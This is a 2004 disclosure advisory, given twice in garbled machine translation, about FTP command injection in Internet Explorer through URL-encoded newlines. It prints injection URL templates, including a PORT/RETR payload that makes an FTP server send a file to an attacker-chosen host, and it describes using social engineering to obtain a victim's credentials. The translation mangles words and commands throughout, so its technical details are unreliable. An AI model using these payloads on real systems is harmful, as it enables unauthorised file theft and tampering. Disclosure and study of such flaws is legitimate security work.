Internet Explorer FTP Command INJECTION

itle: Internet Explorer FTP command injectionAuthor: Albert Puigsech Galicia - Software: Microsoft Internet ExplorerVersions:> = 6.0.2800.1106Remote: yesExploit: yesSeverity: Low-Medium- ---------- -------------------------------------------------- ------ I. Introduction.Internet Explorer is a well-known HTTP browser, and like others it can use more protocols, for example FTP. The security historial of this navigator is really cool and we are glad for the excelent work .. done by Microsoft We love your (in) security features.II Description.In order to access to a server FTP using Internet Explorer you write "ftp: // ftpuser: ftppass @ server / directory" in the directions's bar and thenthe navigator connects to the server and executes the following commands (and other that have omitted because they are not important for this stuff). USER ftpuser PASS ftppass CWD / directory / The security problem resides in which is posible to inject FTP c ommands on the URL adding at the code% 0a followed by your injected commands If you do "ftp: // ftpuser: ftppass @ server / directory% 0asomecommand% 0a".. it will execute those commands USER ftpuser PASS ftppass CWD / directory somecommandThe Last line is an erroneous command, but it's not a problem,

has already been executed.III. ExploitYou need to deceive a user to go to your URL and then to introduce a valid user and password. So yes! The explotation also requires to apply social engineering. Then you can do a lot of things using this Bug Like Create or Delete Files and Directories, But Probably, The Most Interesting Thing is to Download Files. Its Posible To Do That Ursion URL; FTP: // Server /% 0apore 0A, B, C, D, E, F % 0Retr% 20 / FileThen The Server Will Connect To Abcd and Port E, F (See ftp rfc to transfer the port number) and will send the file data.iv. patchesinternet explorer sucks a lot, just turn to firefox world.v. Timeline01 / 12/2004 - Bug discovered on konqueror browser03 / 12/2004 - Tried in IE Also afected 05/12/2004 - Advisor releasedVI Extra dataYou can find more 7a69ezine advisories on this following link:.!. http: // www. 7A69Ezine.org/avisos/propios [spanish info] Translation: akey (more than I diligent :)

December 13, 2004

Title: Internet Explorer FTP Command penetration of: Albert Puigsech Galicia - Software: Microsoft Internet Explorer version: greater than or equal 6.0.2800.1106 remote: You can use: can the extent of damage: low - medium

- - ------------------------------------- -----------------

1 Introduction Internet Explorer is a very famous browser, like many other browsers, can support multi-protocol, such as the FTP file transfer protocol. Regarding the safety history record of this browser is very low, we are very happy to see Microsoft's excellent work, and the future security work is worthy of our peace of mind.

2 Description Access the FTP server via Internet Explorer, is a "ftp: // ftpuser: ftppass @ server / Directory" in the address bar, then the browser automatically performs the following command (other command process is not very important, so Omitted): User FTPUSER PASS FTPPASS CWD / DIRECTORY / The security problem arising is to add% 0A this code after the address bar content, and then keep up with your FTP penetration command. If you do this "ftp: // ftpuser: ftpass @ server / directory% 0asomeCommand% 0A" will execute later. User ftpuser pass ftppass CWD / Directory / SomeCommand The last line is the wrong command, but it is not a problem, because "someCommand" has been executed. 3 Use you can use a valid username and password to deceive a user to your URL. Oh! This utilization needs to apply social engineering. This way you can use this bug to do a lot of things, such as building and deleting files or directories, but usually, the most interested thing is to download files. Similar to the following URL: FTP: // Server /% 0apore 0A, B, B, D, E, F% 0Atr% 20 / File, the server can be connected to the A, B, C, D machine, The port used is E, F (see the FTP RFC documentation on these port parameters) and starts to send file data.